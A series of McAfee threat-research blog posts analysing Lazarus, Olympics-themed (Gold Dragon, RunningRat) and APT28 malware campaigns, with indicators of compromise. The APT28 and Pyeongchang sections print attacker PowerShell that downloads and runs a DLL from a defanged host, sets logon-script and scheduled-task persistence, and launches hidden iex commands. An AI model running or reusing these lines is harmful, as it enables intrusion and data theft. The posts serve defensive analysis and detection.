During our research, we discovered additional variants of the DLL file.


DLL information

 

  • As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory:
    • Copy the unwrapped DLL into new locations in its own memory space.
    • Build imports required by the DLL (based on the IAT of the DLL)
Imports builder code in malware for the DLL imports
  • Call the newly loaded DLL image’s Entry Point (DllMain) with DLL_PROCESS_ATTACH to complete successful loading of the DLL in the malware process.
DLL Entry Point Call from malware to finish loading of the DLL in memory
  • Call the actual malicious export in the DLL named “CoreDn”
Hardcoded DLL export name “CoreDn” in malware

All the malicious activities described below are performed by the DLL unless specified otherwise.

Data Reconnaissance

The implant has the capability of gathering data from the victim’s system. The following information will be gathered and sent to the command and control server.

  • Computer name and currently logged on user’s name, stored in the format

<ComputerName> \ <Username>

Malware obtaining the computer name and user name
  • List of all processes currently running on the system arranged in format

<Process Name>\r\n

<Process Name>\r\n

<Process Name>\r\n

<Process Name>\r\n

Malware collecting process information from endpoint
  • The presence of a specific registry key on the system

HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

  • The malware appends an indicator (flag) specifying whether the above registry key was found in the user’s registry:

This key is checked again as part of the command and control communication and is sent as a duplicate value to the command and control in the HTTP POST request as well (explained in the below).

Malware checking for the presence of the registry key

Exfiltration

Preparation

In preparation of the exfiltration of information collected from the endpoint, the malware performs the following activities:

  • Encode the collected information using a simple byte based XOR operation using the byte key: 0x34.
  • Base64 encode (standard) the XORed data.
  • Again, check for the presence of the Registry Key: HKCU\Software\Bitcoin\Bitcoin-Qt

 

Command and Control Server Communication

Once the malware has performed all these activities it sends an HTTP POST request to the CnC server:

  • www[dot]worker.co.kr for md5 BDAEDB14723C6C8A4688CC8FC1CFE668
  • www[dot]palgong-cc.co.kr for md5 D4C93B85FFE88DDD552860B148831026

 

In the format:

HTTP POST to www[dot]worker.co.kr

/board2004/Upload/files/main.asp?idx=%d&no=%s&mode=%s

OR

 

HTTP POST to www[dot]palgong-cc.co.kr

/html/course/course05.asp?idx=%d&no=%s&mode=%s

where

idx= 20 (14h) if the Registry key does not exist; 24 (18h) if the key exists.

no= XORed + base64 encoded “<Computername> \ <username>”

mode= XORed + base64 encoded Process listing + Registry key flag

Command and control server domain

Persistence

The persistence mechanism of the malware is performed only for the downloaded implant. Persistence is established for the implant via the visual basic macro code initially executed upon document loading by the victim. This persistence is also performed ONLY if the malware successfully executes the downloaded implant. The malware first tries to update the HKEY_LOCAL_MACHINE registry key.

If the update is unsuccessful then it also tries to update the HKEY_CURRENT_USER registry key. Value written to registry to achieve persistence on the endpoint:

Registry Subkey = Software\Microsoft\Windows\CurrentVersion\Run

Value Name = AdobeFlash

Value Content = “C:\DOCUME~1\<username>\LOCALS~1\Temp\OneDrive.exe” kLZXlyJelgqUpKzP

Registry based persistence of the second stage payload

Connections to 2017 campaigns

The techniques, tactics and procedures are very similar to the campaigns that targeted US Defense contractors, US Energy sector, financial organizations and crypto currency exchanges in 2017.

The same Windows User author appeared back in 2017 in two malicious documents 비트코인_지갑주소_및_거래번호.doc and 비트코인 거래내역.xls which were involved in crypto currency targeting. Furthermore, one of the implants communicates to an IP address that was involved in hosting malicious job description documents in 2017 involving the Sikorsky military program.

McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:

  • Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017
  • Same author appeared in these recent malicious documents that also appeared back in Lazarus 2017 campaigns
  • Uses the same malicious document structure and similar job recruitment ads as what we observed in past Lazarus campaigns
  • The techniques, tactics and procedures align with Lazarus group’s interest in crypto currency theft

Conclusion

In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans.

 

 Indicators of Compromise

MITRE ATT&CK techniques

  • Data encoding
  • Data encrypted
  • Command-Line Interface
  • Account discovery
  • Process Discovery
  • Query registry
  • Hidden files and directories
  • Custom cryptographic protocol
  • Registry Run Keys / Start Folder
  • Startup Items
  • Commonly used port
  • Exfiltration Over Command and Control Channel

IPs

  • 210.122.7.129
  • 70.42.52.80
  • 221.164.168.185

URLs

  • hxxps://dl.dropboxusercontent.com/content_link/AKqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
  • hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1

Hashes

  • dc06b737ce6ada23b4d179d81dc7d910a7dbfdde
  • a79488b114f57bd3d8a7fa29e7647e2281ce21f6
  • 7e70793c1ca82006775a0cac2bd75cc9ada37d7c
  • 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
  • 1dd8eba55b16b90f7e8055edca6f4957efb3e1cd
  • afb2595ce1ecf0fdb9631752e32f0e32be3d51bb
  • e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

McAfee Detection

  • BackDoor-FDRO!
  • Trojan-FPCQ!
  • RDN/Generic Downloader.x
  • RDN/Generic Dropper
  • RDN/Generic.dx

The post Lazarus Resurfaces, Targets Global Banks and Bitcoin Users appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/feed/ 0
Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/#respond Fri, 02 Feb 2018 18:51:11 +0000 https://securingtomorrow.mcafee.com/?p=84156 McAfee Advanced Threat Research (ATR) recently released a report describing a fileless attack targeting organizations involved with the Pyeongchang Olympics. The attack used a PowerShell implant that established a channel to the attacker’s server to gather basic system-level data. What was not determined at that time was what occurred after the attacker gained access to the victim’s system.

The post Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems appeared first on McAfee Blogs.

]]>
UPDATE (Feb. 12, 2018): A new variant of the original file-less implant appeared on Feb. 5, 2018, indicating the attack has resumed. The new variant has the same author and metadata as the original documents discovered in December, as well as a nearly identical implant. A key difference, however, is the attackers leveraged hacked servers is Santiago, Chile. See indicators of compromise for this update at the bottom of this post.

ORIGINAL POST (Feb. 2, 2018): McAfee Advanced Threat Research (ATR) recently released a report describing a fileless attack targeting organizations involved with the Pyeongchang Olympics. The attack used a PowerShell implant that established a channel to the attacker’s server to gather basic system-level data. What was not determined at that time was what occurred after the attacker gained access to the victim’s system.

McAfee ATR has now discovered additional implants that are part of an operation to gain persistence for continued data exfiltration and for targeted access. We have named these implants, which appeared in December 2017, Gold Dragon, Brave Prince, Ghost419, and Running Rat, based on phrases in their code.

On December 24, 2017, our analysts observed the Korean-language implant Gold Dragon. We now believe this implant is the second-stage payload in the Olympics attack that ATR discovered January 6, 2018. The PowerShell implant used in the Olympics campaign was a stager based on the PowerShell Empire framework that created an encrypted channel to the attacker’s server. However, this implant required additional modules to be executed to be a fully capable backdoor. In addition, the PowerShell implant did not contain a mechanism to persist beyond a simple scheduled task. Gold Dragon has a much more robust persistence mechanism than the initial PowerShell implant and enables the attacker to do much more to the target system. Gold Dragon reappeared the same day that the Olympics campaign began.

The Gold Dragon malware appears to have expanded capabilities for profiling a target’s system and sending the results to a control server. The PowerShell implant had only basic data-gathering capabilities—such as username, domain, machine name, and network configuration—which are useful only for identifying interesting victims and launching more complex malware against them.

Gold Dragon

Gold Dragon is a data-gathering implant observed in the wild since December 24. Gold Dragon gets its name from the hardcoded domain www.golddragon.com, which we found throughout the samples.

This sample acts as a reconnaissance tool and downloader for subsequent payloads of the malware infection and payload chain. Apart from downloading and executing binaries from the control server, Gold Dragon generates a key to encrypt data that the implant obtains from the system. This URL is not used for control; the encrypted data is sent to the server ink.inkboom.co.kr, which was used by previous implants as early as May 2017.

Gold Dragon contains elements, code, and similar behavior to implants Ghost419 and Brave Prince, which we have tracked since May 2017. A DLL-based implant created on December 21 (the same day the first malicious Olympics document appeared) was downloaded by a Gold Dragon variant created December 24. This variant was created three days before the targeted spear phishing email with the second document that was sent to 333 victim organizations. The December 24 variant of Gold Dragon used the control server nid-help-pchange.atwebpages.com, which was also used by a Brave Prince variant from December 21.

The first variants of Gold Dragon appeared in the wild in South Korea in July 2017. The original Gold Dragon had the file name 한글추출.exe, which translates as Hangul Extraction and was seen exclusively in South Korea. Five variants of Gold Dragon compiled December 24 appeared heavily during the targeting of the Olympics organizations.

Analyzing Gold Dragon

As part of its initialization, Gold Dragon:

  • Builds its imports by dynamically loading multiple APIs from multiple libraries
  • Gains debug privileges (“SeDebugPrivilege”) for its own process to read remote memory residing in other processes

The malware does not establish persistence for itself but for another component (if it is found) on the system:

  • The malware begins by looking for an instance of the Hangul word processor (HWP) running on the system. (HWP is a Korean word processor similar to Microsoft Word.)

Checking for HWP.exe in the process list.

  • If HWP.exe is found running on the system, the malware finds the currently open file in HWP by extracting the file path from the command-line argument passed to HWP.exe
  • This word file (usually named *.hwp) is copied into the temporary file path

C:\DOCUME~1\<username>\LOCALS~1\Temp\2.hwp

  • hwp is an exact copy of the file loaded into HWP.exe
  • The malware reads the contents of 2.hwp and finds an “MZ magic marker” in the file indicated by the string “JOYBERTM”

Checking for the MZ marker in the HWP file.

  • This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user:

C:\Documents and Settings\<username>\Start Menu\Programs\Startup\viso.exe

  • This step establishes the persistence of the malware across reboots on the endpoint
  • Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint

The malware might perform this activity for a couple of reasons:

  • Establish persistence for itself on the endpoint
  • Establish persistence of another component of the malware on the endpoint
  • Update itself on endpoint after a separate updater component downloads the update from the control server

The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware. Any information gathered from the endpoint is first stored in the following file, encrypted, and sent to the control server:

  • C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

The following information is gathered from the endpoint, stored in the file 1.hwp, and sent to the control server:

  • Directory listing of the user’s Desktop folder using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Desktop\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the user’s recently accessed files using command:

cmd.exe /c dir C:\DOCUME~1\<username>\Recent >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Directory listing of the system’s %programfiles% folder using command:

cmd.exe /c dir C:\PROGRA~1\ >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Systeminfo of the endpoint using command:

cmd.exe /c systeminfo >> C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Copies the file ixe000.bin from:

C:\Documents and Settings\<username>\Application Data\Microsoft\Windows\UserProfiles\ixe000.bin

To:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\1.hwp

  • Registry key and value information for the current user’s Run key (with information collected):

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Number of subkeys

(<KeyIndex>) <KeyName>

Number of Values under each key including the parent Run key

(<ValueIndex>) <Value_Name> <Value_Content>

Registry Run key enumeration by Gold Dragon.

An example of 1.hwp with registry and system information:

Gold Dragon executes these steps executed in the exfiltration process:

  • Once the malware has gathered the required data from the endpoint, it encrypts the data file 1.hwp using the password “www[dot]GoldDragon[dot]com”
  • The encrypted content is written to the data file 1.hwp.
  • During the exfiltration process, the malware Base64-encodes the encrypted data and sends it to its control server using an HTTP POST request to the URL:

http://ink[dot]inkboom.co.kr/host/img/jpg/post.php

  • HTTP data/parameters used in the request include:
    • Content-Type: multipart/form-data; boundary=—-WebKitFormBoundar ywhpFxMBe19cSjFnG <followed by base64 encoded & encrypted system info>
    • User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)
    • Accept-Language: en-us
    • HTTP Version: HTTP/1.0

The malware can also download and execute additional components served to it by the control server. The mechanism for downloading additional components is based on the Computer Name and UserName of the endpoint provided by the malware process to the control server in the following HTTP GET request:

GET http://ink[dot]inkboom.co.kr/host/img/jpg/download.php?filename=<Computer_Name>_<username>&continue=dnsadmin

After successfully retrieving the component from the control server, the next-stage payload is copied to the Application Data directory of the current user and executed:

C:\DOCUME~1\<username>\APPLIC~1\MICROS~1\HNC\hupdate.ex

(note “ex,” not “exe”)

The capability to download additional components from the control server.

The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products:

  • The presence of any process with the keywords “v3” and “cleaner.”

Checking for antimalware or cleaner processes.

  • If found, these processes are terminated by sending a WM_CLOSE message to their windowing threads.

Terminating an antimalware/cleaner process.

 

Brave Prince

Brave Prince is a Korean-language implant that contains similar code and behavior to the Gold Dragon variants, specifically the system profiling and control server communication mechanism. The malware gathers detailed logs about the victim’s configuration, contents of the hard drive, registry, scheduled tasks, running processes, and more. Brave Prince was first observed in the wild December 13, 2017, sending logs to the attacker via South Korea’s Daum email service. Later variants posted the data to a web server via an HTTP post command, in the same way that Gold Dragon does.

The embedded domain braveprince.com.

The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker’s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim’s system:

  • Directories and files
  • Network configuration
  • Address resolution protocol cache
  • Systemconfig to gather tasks

Both variants of Brave Prince can kill a process associated with a tool created by Daum that can block malicious code. This tool is exclusive to South Korea.

  • taskkill /f /im daumcleaner.exe

The later variants of Brave Prince include the following hardcoded strings:

  • c:\utils\c2ae_uiproxy.exe
  • c:\users\sales\appdata\local\temp\dwrrypm.dl

 

Ghost419

Ghost419 is a Korean-language implant that first appeared in the wild December 18, 2017, with the most recent sample appearing two days before the Olympics spear phishing email. The malware can be identified by the hardcoded string and URL parameter passed to the control server. Ghost419 can be traced to a sample created July 29, 2017, that appears to be a much earlier version (without the hardcoded identifier). The July version shares 46% of its code with samples created in late December. This early version implant creates a unique mutex value (kjie23948_34238958_KJ238742) that also appears in a sample from December, with the exception that one digit has changed. Ghost419 is based on Gold Dragon and Brave Prince implants and contains shared elements and code, especially for system reconnaissance functions.

Hardcoded “Ghost419” in the malware binary.

The string “WebKitFormBoundarywhpFxMBe19cSjFnG,” part of the upload mechanism, also appears in the Gold Dragon variants of late December 2017.

Gold Dragon sample.

Ghost419 sample.

Numerous other similarities are present in addition to system reconnaissance methods; the communication mechanism uses the same user agent string as Gold Dragon.

Gold Dragon user agent string.

Ghost419 user agent string.

 

RunningRat

RunningRat is a remote access Trojan (RAT) that operates with two DLLs. It gets its name from a hardcoded string embedded in the malware. Upon being dropped onto a system, the first DLL executes. This DLL serves three main functions: killing antimalware, unpacking and executing the main RAT DLL, and obtaining persistence. The malware drops the Windows batch file dx.bat, which attempts to kill the task daumcleaner.exe; a Korean security program. The batch file then attempts to remove itself.

The first DLL unpacks a resource file attached to the DLL using a zlib decompression algorithm. The authors of the malware left the debugging strings in the binary, making the algorithm easy to identify. The second DLL is decompressed in memory and never touches the user’s file system; this file is the main RAT that executes. Finally, the first DLL adds the registry key “SysRat,” at SoftWare\Microsoft\Windows\CurrentVersion\Run, to ensure the malware is executed at startup.

After the second DLL is loaded into memory, the first DLL overwrites the IP address for the control server, effectively changing the address the malware will communicate with. This address is hardcoded in the second DLL as 200.200.200.13 and is modified by the first DLL to 223.194.70.136.

This type of behavior may indicate this code is being reused or is part of a malware kit.

The first DLL uses one common antidebugging technique by checking for SeDebugPrivilege.

Once the second DLL is executed, it gathers information about the victim system’s setup, such as operating system version, and driver and processor information.

The malware initiates its main function of capturing user keystrokes and sending them to the control server using standard Windows networking APIs.

From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed.

McAfee ATR analysts will continue to research RunningRat to determine if this extra code is used or is possibly left over from a larger RAT toolkit.

The second DLL employs a few additional antidebugging techniques. One is the use of a custom exception handler and code paths that are designed to generate exceptions.

There are also a few random empty-nested threads to slow down researchers during static analysis.

The final antidebugging technique involves GetTickCount performance counters, which are placed within the main sections of code to detect any delay a debugger adds during runtime.

  

Conclusion

The PowerShell script first discovered by McAfee ATR was delivered via a spear phishing campaign that used image stenography techniques to hide the first-stage implant. (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.)

The implants covered in this research establish a permanent presence on the victim’s system once the PowerShell implant is executed. The implants are delivered as a second stage once the attacker gains an initial foothold using fileless malware. Some of the implants will maintain their persistence only if Hangul Word, which is specific to South Korea, is running.

With the discovery of these implants, we now have a better understanding of the scope of this operation. Gold Dragon, Brave Prince, Ghost419, and RunningRat demonstrate a much wider campaign than previously known. The persistent data exfiltration we see from these implants could give the attacker a potential advantage during the Olympics.

We thank Charles Crawford and Asheer Malhotra for their support of this analysis.

 

Indicators of Compromise

IPs

  • 223.194.70.136

Domains

  • trydai.000webhostapp.com
  • follow_dai.000webhostapp.com
  • eodo1.000webhostapp.com
  • nid-help-pchange.atwebpages.com
  • ink.inkboom.co.kr
  • followgho.byethost7.com

Hashes

  • fef671c13039df24e1606d5fdc65c92fbc1578d9
  • 06948ab527ae415f32ed4b0f0d70be4a86b364a5
  • 96a2fda8f26018724c86b275fe9396e24b26ec9e
  • ad08a60dc511d9b69e584c1310dbd6039acffa0d
  • c2f01355880cd9dfeef75cff189f4a8af421e0d3
  • 615447f458463dc77f7ae3b0a4ad20ca2303027a
  • bf21667e4b48b8857020ba455531c9c4f2560740
  • bc6cb78e20cb20285149d55563f6fdcf4aaafa58
  • 465d48ae849bbd6505263f3323e818ccb501ba88
  • a9eb9a1734bb84bbc60df38d4a1e02a870962857
  • 539acd9145befd7e670fe826c248766f46f0d041
  • d63c7d7305a8b2184fff3b0941e596f09287aa66
  • 35e5310b6183469f4995b7cd4f795da8459087a4
  • 11a38a9d23193d9582d02ab0eae767c3933066ec
  • e68f43ecb03330ff0420047b61933583b4144585
  • 83706ddaa5ea5ee2cfff54b7c809458a39163a7a
  • 3a0c617d17e7f819775e48f7edefe9af84a1446b
  • 761b0690cd86fb472738b6dc32661ace5cf18893
  • 7e74f034d8aa4570bd1b7dcfcdfaa52c9a139361
  • 5e1326dd7122e2e2aed04ca4de180d16686853a7
  • 6e13875449beb00884e07a38d0dd2a73afe38283
  • 4f58e6a7a04be2b2ecbcdcbae6f281778fdbd9f9
  • 389db34c3a37fd288e92463302629aa48be06e35
  • 71f337dc65459027f4ab26198270368f68d7ae77
  • 5a7fdfa88addb88680c2f0d5f7095220b4bbffc1

Indicators of Compromise for Feb. 12 update:

Hashes

  •  Sha1: 7ae731d666e547b4f3442fe5675c8e8719d8d862

URLs

  • hxxps://minibodegaslock.cl:443/components/com_tags/controllers/default_tags.php
  • hxxps://minibodegaslock.cl/components/com_tags/controllers/access_log

The post Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/feed/ 0
Malicious Document Targets Pyeongchang Olympics https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-document-targets-pyeongchang-olympics/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-document-targets-pyeongchang-olympics/#respond Sat, 06 Jan 2018 17:00:39 +0000 https://securingtomorrow.mcafee.com/?p=83466 McAfee Advanced Threat Research analysts have discovered a campaign targeting organizations involved with the Pyeongchang Olympics. Attached in an email was a malicious Microsoft Word document with the original file name 농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc (“Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”). The primary target of […]

The post Malicious Document Targets Pyeongchang Olympics appeared first on McAfee Blogs.

]]>
McAfee Advanced Threat Research analysts have discovered a campaign targeting organizations involved with the Pyeongchang Olympics.

Attached in an email was a malicious Microsoft Word document with the original file name 농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc (“Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”).

The primary target of the email was icehockey@pyeongchang2018.com, with several organizations in South Korea on the BCC line. The majority of these organizations had some association with the Olympics, either in providing infrastructure or in a supporting role. The attackers appear to be casting a wide net with this campaign.

The campaign to target Pyeongchang Olympics began December 22, 2017 with the most recent activity appearing December 28. The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file, and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. They also wrote custom PowerShell code to decode the hidden image and reveal the implant.

Analysis

The malicious document was submitted from South Korea to Virus Total on December 29 at 09:04, a day after the original email was sent to the target list. The email was sent from the IP address 43.249.39.152, in Singapore, on December 28 at 23:34. The attacker spoofed the message to appear to be from info@nctc.go.kr, which is the National Counter-Terrorism Center (NCTC) in South Korea. The timing is interesting because the NCTC was in the process of conducting physical antiterror drills in the region in preparation for the Olympic Games. The spoofed source of this email suggests the message is legitimate and increases the chances that victims will treat it as such.

Based on our analysis of the email header, this message did not come from NCTC, rather from the attacker’s IP address in Singapore. The message was sent from a Postfix email server and originated from the hostname ospf1-apac-sg.stickyadstv.com. When the user opens the document, text in Korean tells the victim to enable content to allow the document to be opened in their version of Word.

The malicious document with instructions to enable content.

The enable content message.

The document contains an obfuscated Visual Basic macro:

Visual Basic macro.

The malicious document launches a PowerShell script when the user clicks “Enable Content.” The document was created on December 27 at 15:52 by the author “John.”

The malicious document launches the following PowerShell script:

Manually executing the PowerShell script at the command line.

The script downloads and reads an image file from a remote location and carves out a hidden PowerShell implant script embedded within the image file to execute.

The attackers used the open-source tool Invoke-PSImage, released December 20, to embed the PowerShell script into the image file. The steganography tool works by embedding the bytes of a script into the pixels of the image file, giving the attacker the ability to hide malicious PowerShell code in a visible image on a remote server. The following script can be identified as generated by Invoke-PSImage to execute the attacker’s implant in an image from a remote server.

The initial PowerShell script.

The image that contains the hidden PowerShell code.

To verify the usage of steganography, we employed the tool StegExpose to check the file:

The result confirms the presence of hidden data in our file.

Once the script runs, it passes the decoded script from the image file to the Windows command line in a variable $x, which uses cmd.exe to execute the obfuscated script and run it via PowerShell.

&&set  xmd=echo  iex (ls env:tjdm).value ^| powershell -noni  -noex  -execut bypass -noprofile  -wind  hidden     – && cmd   /C%xmd%

The extracted script is heavily disguised, using a combination of string-format operator obfuscation and other string-based obfuscation techniques.

The obfuscated PowerShell implant script.

The attacker’s objective is to make analysis difficult and to evade detection technologies that rely on pattern matching. Because the obfuscation makes use of native functions in PowerShell, the script can run in an obfuscated state and work correctly.

Obfuscated control servers.

When we deobfuscate the control server URLs, the implant establishes a connection to the following site over SSL:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/login/process.php.

Based on our analysis, this implant establishes an encrypted channel to the attacker’s server, likely giving the attacker the ability to execute commands on the victim’s machine and to install additional malware. Ultimately this PowerShell implant will be set to automatically start daily at 2 am via a scheduled task (shown below). The view.hta contains the same PowerShell-based implant and establishes a remote connection over SSL to hxxps://200.122.181.63:443/components/com_tags/views/news.php.

C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 14:00 /TN “MS Remoute Update” /TR C:\Users\Ops03\AppData\Local\view.hta

The contents of view.hta.

During our research, we discovered a cached Apache server log for the IP address 81.31.47.101, which is shared hosting. This log contained information for the control server thlsystems.forfirst.cz, which showed an IP address from South Korea connecting to the specific URL paths contained in the PowerShell implants. This indicates that the implant was active in South Korea and targets were likely being infected.

Apache server log from December 29, 2017.

While investigating thlsystems.forfirst.cz we discovered that the webpage belongs to a legitimate entity, suggesting this is a compromised server being used as both an encrypted backchannel for the attacker and the distribution of implants. The server also hosts a copy of the obfuscated PowerShell implant.

The implant establishes an encrypted channel to the following URL path:

hxxps://www.thlsystems.forfirst.cz:443/components/com_tags/views/admin/get.php

An image from December 30, 2017.

When investigating the IP address from the PowerShell implant 200.122.181.63 we found a server in Costa Rica that resolves to mafra.go.kr.jeojang.ga. The domain jeojang.ga was registered via Freenom, a free anonymous domain provider. It appears the attacker is using parts of a domain that belong to the South Korean Ministry of Agriculture and Forestry, which is in line with the attached document name in the email, but this domain has nothing to do with this government agency.

A version of the malicious document from December 22 embedded the PowerShell implant directly into the Word document in the form of an HTA file. McAfee Advanced Threat Research analysts discovered another document that was hosted at this domain; its original title is 위험 경보 (전국야생조류 분변 고병원성 AI(H5N6형) 검출).docx, which also appears to come from the Ministry of Agriculture and Forestry. This document was created on December 22 by the same author, “John.” The document does not contain macros, rather OLE streams for the embedded HTA files. When the Korean-language docx icon is clicked, it launches the embedded HTA file Error733.hta. This file contains the same script code to launch the PowerShell implant as in the view.hta example.

An earlier malicious document that relies on OLE streams.

 

Conclusion

The basic method in this case, an in-memory implant using PowerShell along with obfuscation to avoid detection, is a common and increasing popular fileless technique used in cyberattacks. We have not previously seen this kind of attack targeting victims in South Korea.

The use of the steganography tool shows how quickly the adversary has adapted to new tools. On December 20, the tool Invoke-PSImage was released to the public and within seven days was tested and deployed in a campaign targeting organizations involved in the 2018 Pyeongchang Olympics.

With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes. In similar past cases, the victims were targeted for their passwords and financial information. In this case the adversary is targeting the organizations involved in the Winter Olympics by using several techniques to make it more tempting to open the weaponized document:

  • Spoofed email address from South Korea’s National Counter-Terrorism Council
  • Use of Korean language
  • Asking users to open the content because the document is in protected mode
  • Partial use of the original South Korean Ministry of Agriculture and Forestry domain in a registered fake domain for malicious intent

The Advanced Threat Research team has discovered an increase in the use of weaponized Word documents against South Korean targets in place of the traditional use of weaponized documents exploiting vulnerabilities in the Hangul word processor software.

 

Indicators of compromise

SHA-1

  • c388b693d10e2b84af52ab2c29eb9328e47c3c16
  • 8ad0a56e3db1e2cd730031bdcae2dbba3f7aba9c

IPs

  • 200.122.181.63

Domains

  • thlsystems.forfirst.cz
  • mafra.go.kr.jeojang.ga

The post Malicious Document Targets Pyeongchang Olympics appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/malicious-document-targets-pyeongchang-olympics/feed/ 0
Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/#comments Tue, 07 Nov 2017 18:00:01 +0000 https://securingtomorrow.mcafee.com/?p=82022 This blog post was co-written by Michael Rea. During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research analysts identified a malicious Word document that appears to leverage the Microsoft Office Dynamic Data Exchange (DDE) technique that has been previously reported by Advanced Threat Research. This document likely marks the first […]

The post Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack appeared first on McAfee Blogs.

]]>
This blog post was co-written by Michael Rea.

During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research analysts identified a malicious Word document that appears to leverage the Microsoft Office Dynamic Data Exchange (DDE) technique that has been previously reported by Advanced Threat Research. This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim’s system regardless whether macros are enabled. (McAfee product detection is covered in the Indicators of Compromise section at the end of the document.)

APT28, also known as Fancy Bear, has recently focused on using different themes. In this case it capitalized on the recent terrorist attack in New York City. The document itself is blank. Once opened, the document contacts a control server to drop the first stage of the malware, Seduploader, onto a victim’s system.

The domain involved in the distribution of Seduploader was created on October 19, 11 days prior to the creation of Seduploader.

The document we examined for this post:

  • Filename: IsisAttackInNewYork.docx
  • Sha1: 1c6c700ceebfbe799e115582665105caa03c5c9e
  • Creation date: 2017-10-27T22:23:00Z

The document uses the recently detailed DDE technique found in Office products to invoke the command prompt to invoke PowerShell, which runs two commands. The first:

C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://netmediaresources[.]com/config.txt’);powershell -enc $e #.EXE

The second PowerShell command is Base64 encoded and is found in the version of config.txt received from the remote server. It decodes as follows:

$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+”\vms.dll”);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile(“hxxp://netmediaresources[.]com/media/resource/vms.dll “,$p);
if (Test-Path $p){
$rd_p=$Env:SYSTEMROOT+”\System32\rundll32.exe”;
$p_a=$p+”,#1″;
$pr=Start-Process $rd_p -ArgumentList $p_a;
$p_bat=($Env:ALLUSERSPROFILE+”\vms.bat”);
$text=’set inst_pck = “%ALLUSERSPROFILE%\vms.dll”‘+”`r`n”+’if NOT exist %inst_pck % (exit)’+”`r`n”+’start rundll32.exe %inst_pck %,#1’
[io.File]::WriteAllText($p_bat,$text)
New-Item -Path ‘HKCU:\Environment’ -Force | Out-Null;
New-ItemProperty -Path ‘HKCU:\Environment’ -Name ‘UserInitMprLogonScript’ -Value “$p_bat” -PropertyType String -Force | Out-Null;
}

The PowerShell scripts contact the following URL to download Seduploader:

  • hxxp://netmediaresources[.]com/media/resource/vms.dll

The Seduploader sample has the following artifacts:

  • Filename: vms.dll
  • Sha1: 4bc722a9b0492a50bd86a1341f02c74c0d773db7
